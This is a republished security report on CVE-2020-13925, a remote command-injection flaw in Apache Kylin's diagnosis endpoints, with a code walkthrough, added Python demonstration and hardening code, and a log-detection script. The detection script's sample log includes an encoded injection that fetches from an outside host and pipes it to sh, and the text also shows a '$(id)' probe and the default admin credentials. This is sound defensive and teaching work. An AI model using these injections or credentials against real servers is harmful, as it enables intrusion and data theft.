Apache Kylin remote command execution vulnerability CVE-2020-13925 what is reported

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article reproduces the report on the Apache Kylin remote command execution vulnerability CVE-2020-13925 in detail; readers working with Kylin or similar big data platforms should find it useful.

Summary

In June, JD.com's security Blue Army team discovered a serious remote command execution vulnerability in Apache Kylin (CVE-2020-13925). An attacker who can log in to the web UI, for example with the default administrator account whose password was never changed, can exploit it to run arbitrary operating system commands with the privileges of the account running Kylin. Because Apache Kylin sits at the centre of many enterprise big data analysis platforms, the vulnerability puts core business data at risk of leakage. Users are advised to upgrade to a fixed version as soon as possible.

About Apache Kylin

Apache Kylin was created and open-sourced by eBay in 2013 and became a top-level project of the Apache Software Foundation in 2015. It is a widely used open source distributed analytical data warehouse for big data, providing a SQL query interface and multi-dimensional analysis (OLAP) on top of Hadoop/Spark. With the rapid growth of the big data industry in recent years, Apache Kylin has been adopted by many large Internet companies at home and abroad and is known in the industry as big data's "mythical beast".

Home page: https://kylin.apache.org/

Source code: https://github.com/apache/kylin

Authoritative Guide to Apache Kylin (2nd Edition): https://book.douban.com/subject/34804888/

Overview of vulnerabilities

Kylin provides a web UI with a separate front end and back end, in which users manage projects, create models, analyze data, and so on.

The back end also exposes a set of system diagnosis interfaces. They collect diagnostic information about a project, a job, or the operating system when a fault occurs, to make debugging easier.

The flaw is that two of these interfaces perform no validation on their input parameters and splice them into a string that is later executed as a system command. By calling the interface with crafted parameter values, an attacker can execute arbitrary system commands remotely and obtain the privileges of the operating system account under which Apache Kylin runs.

Calling the two vulnerable interfaces requires a logged-in account. However, after installation, or after deploying the Docker container, the web UI ships with a default administrator account admin and a fixed default password "KYLIN"; if the administrator has not deliberately changed it, an attacker can log in and exploit the vulnerability directly. It can equally be used by an attacker or an insider who obtains an account or a session by other means to escalate their privileges.

Because Apache Kylin is a big data analysis platform it must connect to data sources, and in some large enterprises it has direct access to core data. A compromise therefore carries a high data security risk.

Loophole analysis

Let's take 3.0.2, the last release before the fix, as the example and analyze its code:

https://github.com/apache/kylin/tree/kylin-3.0.2

The vulnerability lies in two interfaces:

* /kylin/api/diag/project/{project}/download
* /kylin/api/diag/job/{jobId}/download

The two interfaces follow the same vulnerable code path, so let's take the first one as the example. The controller code:

https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/controller/DiagnosisController.java

```java
@RequestMapping(value = "/project/{project}/download", method = { RequestMethod.GET }, produces = { "application/json" })
@ResponseBody
public void dumpProjectDiagnosisInfo(@PathVariable String project, final HttpServletRequest request,
        final HttpServletResponse response) {
    try (AutoDeleteDirectory diagDir = new AutoDeleteDirectory("diag_project", "")) {
        String filePath = dgService.dumpProjectDiagnosisInfo(project, diagDir.getFile());
        setDownloadResponse(filePath, response);
    } catch (IOException e) {
        throw new InternalErrorException("Failed to dump project diagnosis info. " + e.getMessage(), e);
    }
}
```

{project} is a path parameter mapped to the variable project, which is passed straight into the dumpProjectDiagnosisInfo method of dgService without any processing:

https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/service/DiagnosisService.java

```java
public String dumpProjectDiagnosisInfo(String project, File exportPath) throws IOException {
    aclEvaluate.checkProjectOperationPermission(project);
    String[] args = { project, exportPath.getAbsolutePath() };
    runDiagnosisCLI(args);
    return getDiagnosisPackageName(exportPath);
}
```

The project parameter is placed in the args array and passed to runDiagnosisCLI; the method name alone tells us a command is about to be executed. Before that, however, checkProjectOperationPermission checks whether the user is allowed to operate on the project:

```java
public void checkProjectOperationPermission(String projectName) {
    ProjectInstance projectInstance = getProjectInstance(projectName);
    aclUtil.hasProjectOperationPermission(projectInstance);
}

// get project instance
private ProjectInstance getProjectInstance(String projectName) {
    return ProjectManager.getInstance(KylinConfig.getInstanceFromEnv()).getProject(projectName);
}

public ProjectInstance getProject(String projectName) {
    // Null check is needed for ConcurrentMap does not supporting .get(null)
    if (projectName == null)
        return null;
    try (AutoLock lock = prjMapLock.lockForRead()) {
        return projectMap.get(projectName);
    }
}
```

This is just a lookup in a map. If we pass a project name such as poc or exp, which of course does not exist, getProject returns null. Back at the permission check entry point, checkProjectOperationPermission receives projectInstance as null and passes it on to aclUtil.hasProjectOperationPermission:

```java
@PreAuthorize(Constant.ACCESS_HAS_ROLE_ADMIN + " or hasPermission(#project, 'ADMINISTRATION')"
        + " or hasPermission(#project, 'MANAGEMENT')" + " or hasPermission(#project, 'OPERATION')")
public boolean hasProjectOperationPermission(ProjectInstance project) {
    return true;
}
```

This is the interesting part. The check is done entirely by the PreAuthorize annotation on the caller's identity: as long as the user is an admin, or holds the administration/management/operation permission, the method body simply returns true. The method never looks at the project instance itself, which suggests the per-project permission logic had not been implemented yet and was temporarily replaced by an identity check.

Therefore, a user with any of those roles or permissions passes the permission check even when the project they supplied does not exist; a null projectInstance is never rejected.

Let's see how runDiagnosisCLI executes the command.

```java
private void runDiagnosisCLI(String[] args) throws IOException {
    Message msg = MsgPicker.getMsg();
    File cwd = new File("");
    logger.debug("Current path: {}", cwd.getAbsolutePath());
    logger.debug("DiagnosisInfoCLI args: {}", Arrays.toString(args));
    File script = new File(KylinConfig.getKylinHome() + File.separator + "bin", "diag.sh");
    if (!script.exists()) {
        throw new BadRequestException(String.format(Locale.ROOT, msg.getDIAG_NOT_FOUND(), script.getAbsolutePath()));
    }
    String diagCmd = script.getAbsolutePath() + " " + StringUtils.join(args, " ");
    CliCommandExecutor executor = KylinConfig.getInstanceFromEnv().getCliCommandExecutor();
    Pair<Integer, String> cmdOutput = executor.execute(diagCmd);
    if (cmdOutput.getFirst() != 0) {
        throw new BadRequestException(msg.getGENERATE_DIAG_PACKAGE_FAIL());
    }
}

public Pair<Integer, String> execute(String command) throws IOException {
    return execute(command, new SoutLogger());
}

public Pair<Integer, String> execute(String command, Logger logAppender) throws IOException {
    Pair<Integer, String> r;
    if (remoteHost == null) {
        r = runNativeCommand(command, logAppender);
    } else {
        r = runRemoteCommand(command, logAppender);
    }
    if (r.getFirst() != 0)
        throw new IOException("OS command error exit with return code: " + r.getFirst() //
                + ", error message: " + r.getSecond() + "The command is: \n" + command
                + (remoteHost == null ? "" : " (remoteHost:" + remoteHost + ")") //
        );
    return r;
}
```

remoteHost is an option for running the command on another server over SSH; it is not used in our scenario, so we follow runNativeCommand:

```java
private Pair<Integer, String> runNativeCommand(String command, Logger logAppender) throws IOException {
    String[] cmd = new String[3];
    String osName = System.getProperty("os.name");
    if (osName.startsWith("Windows")) {
        cmd[0] = "cmd.exe";
        cmd[1] = "/C";
    } else {
        cmd[0] = "/bin/bash";
        cmd[1] = "-c";
    }
    cmd[2] = command;
    ProcessBuilder builder = new ProcessBuilder(cmd);
    builder.redirectErrorStream(true);
    Process proc = builder.start();
    // ...
}
```

Here the project parameter we supplied, now concatenated into a single command string, is handed to /bin/bash -c (or cmd.exe /C on Windows) through java.lang.ProcessBuilder. Because a shell parses the string, metacharacters such as ;, |, $(...) and backticks in the project name are interpreted as command syntax rather than as part of an argument to diag.sh. Note too that the exit code is only checked after the shell has run the whole string, so the injected commands execute even when diag.sh itself fails and the API returns an error.
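The following is an added example, not Kylin's code and not the project's 3.1.0 patch: it rebuilds the runDiagnosisCLI/runNativeCommand pattern in Python so the injection can be run and observed, and places a hardened version next to it. Assumptions not taken from the advisory: the echo binary stands in for $KYLIN_HOME/bin/diag.sh so the example runs on any host with /bin/sh, the export path is a constructed constant, and KNOWN_PROJECTS is a constructed stand-in for ProjectManager.getProject().

```python
"""Added example (not Apache Kylin code): the diag command-concatenation
pattern from CVE-2020-13925 next to a hardened version of the same call."""
import re
import subprocess

# Stand-in for $KYLIN_HOME/bin/diag.sh (assumption): `echo` prints its argv,
# which is enough to show what reaches the script versus what the shell ate.
DIAG_SCRIPT = "echo"
EXPORT_PATH = "/tmp/diag_project"  # constructed; stands in for diagDir.getFile()

# Constructed stand-in for the project map behind ProjectManager.getProject().
KNOWN_PROJECTS = {"learn_kylin", "sales_dw"}

# Strict allow-list for the path parameter: identifier characters only.
PROJECT_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,100}$")


def build_diag_cmd(project: str) -> str:
    """Same string runDiagnosisCLI builds: script + " " + join(args, " ")."""
    args = [project, EXPORT_PATH]
    return DIAG_SCRIPT + " " + " ".join(args)


def run_vulnerable(project: str) -> str:
    """Mirror of runNativeCommand on Linux: the whole string goes to a shell
    (Kylin uses /bin/bash -c; /bin/sh -c here for portability), so `;`, `|`,
    `$(...)` and backticks in `project` are executed, not passed as a name."""
    cmd = build_diag_cmd(project)
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout


def classify_project(project: str) -> str:
    """Hardened front door, two independent checks.
    "invalid_name": fails the allow-list, closing the metacharacter channel even
    if the registry check is weakened later.
    "unknown_project": not registered, the case the null ProjectInstance let
    through the original permission check."""
    if not PROJECT_NAME_RE.fullmatch(project):
        return "invalid_name"
    if project not in KNOWN_PROJECTS:
        return "unknown_project"
    return "ok"


def run_hardened(project: str) -> str:
    """Validate, then exec WITHOUT a shell: argv is a list, so nothing between
    the HTTP parameter and the script re-parses it."""
    verdict = classify_project(project)
    if verdict == "invalid_name":
        raise ValueError("invalid project name: %r" % project)
    if verdict == "unknown_project":
        raise LookupError("no such project: %r" % project)
    proc = subprocess.run([DIAG_SCRIPT, project, EXPORT_PATH],
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "poc;echo INJECTED"
    print("vulnerable ->", run_vulnerable(payload).rstrip())
    for name in (payload, "nope", "learn_kylin"):
        try:
            print("hardened   ->", run_hardened(name).rstrip())
        except (ValueError, LookupError) as err:
            print("hardened rejected:", err)
```

With the payload `poc;echo INJECTED`, the vulnerable path prints `poc` from the first command and then `INJECTED /tmp/diag_project` from the second, exactly as the shell split it; the hardened path rejects the same input before any process is started, and passes `learn_kylin` through as a single argv element. Of the two checks, the allow-list is the one that actually removes the injection; the existence check only restores the semantics the broken permission check lost.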

Affected scope

Vulnerability introduced:

2016-04-29

Affected versions:

2.3.0 - 2.3.2

2.4.0 - 2.4.1

2.5.0 - 2.5.2

2.6.0 - 2.6.4

3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0 through 3.0.2 (the last release before the fix)

Fixed version:

3.1.0

Fix date:

2020-06-27

Remediation

Upgrade Apache Kylin to 3.1.0 or later, the latest available release:

https://github.com/apache/kylin/releases

https://hub.docker.com/r/apachekylin/apache-kylin-standalone/tags

Independently of the upgrade, change the default admin password (the vulnerable interfaces require a logged-in session, and the default credentials are the easiest way to obtain one) and do not expose the Kylin web UI beyond the users who need it.
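Until the upgrade is rolled out, the two download endpoints are easy to watch for. The following is an added example, not part of the advisory or of Kylin: it scans web-server access logs for requests to /kylin/api/diag/project/{project}/download and /kylin/api/diag/job/{jobId}/download whose path parameter, once URL-decoded, contains anything other than identifier characters. The log lines are constructed for the example, and the common-log-style format and the assumption that the logger records the raw, still URL-encoded request path are assumptions about the deployment rather than facts from the page.

```python
"""Added example (not from the advisory): flag diag download requests whose
path parameter carries shell metacharacters, from constructed access logs."""
import re
from urllib.parse import unquote

# The two vulnerable endpoints; group 2 is the user-controlled path segment.
DIAG_RE = re.compile(r"^/kylin/api/diag/(project|job)/(.+)/download/?$")

# A genuine project or job id never needs anything outside this set.
SAFE_SEGMENT_RE = re.compile(r"^[A-Za-z0-9_\-]+$")

# Common log format (assumed): ip ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Constructed sample: one benign download, one encoded injection attempt on the
# project endpoint, one unrelated request, and a probe of the job endpoint.
SAMPLE_LOG = """\
10.0.0.5 - admin [27/Jun/2020:10:01:02 +0000] "GET /kylin/api/diag/project/learn_kylin/download HTTP/1.1" 200 48211
203.0.113.7 - admin [27/Jun/2020:10:03:14 +0000] "GET /kylin/api/diag/project/poc%3Bcurl%20198.51.100.9%2Fx%7Csh/download HTTP/1.1" 400 112
10.0.0.5 - admin [27/Jun/2020:10:04:00 +0000] "GET /kylin/api/projects HTTP/1.1" 200 1983
203.0.113.7 - admin [27/Jun/2020:10:05:41 +0000] "GET /kylin/api/diag/job/x%24(id)/download HTTP/1.1" 400 112
"""


def suspicious_diag_requests(log_text: str):
    """Return (ip, user, endpoint, decoded_segment) for every diag download
    whose path parameter is not a plain identifier after URL-decoding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]   # ignore any query string
        d = DIAG_RE.match(path)
        if not d:
            continue
        segment = unquote(d.group(2))              # decode before inspecting
        if not SAFE_SEGMENT_RE.fullmatch(segment):
            hits.append((m.group("ip"), m.group("user"), d.group(1), segment))
    return hits


if __name__ == "__main__":
    for ip, user, endpoint, segment in suspicious_diag_requests(SAMPLE_LOG):
        print(f"{ip} as {user}: diag/{endpoint} with parameter {segment!r}")
```

Two points to keep in mind when turning this into a rule. Decode before matching, since the injection arrives percent-encoded in the URL and a pattern on the raw path misses it. And do not filter on the response status: as the analysis above shows, the injected commands run before diag.sh's exit code is checked, so a 400 on these requests is evidence of an attempt, not of a failed one.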

That concludes the report on the Apache Kylin remote command execution vulnerability CVE-2020-13925.
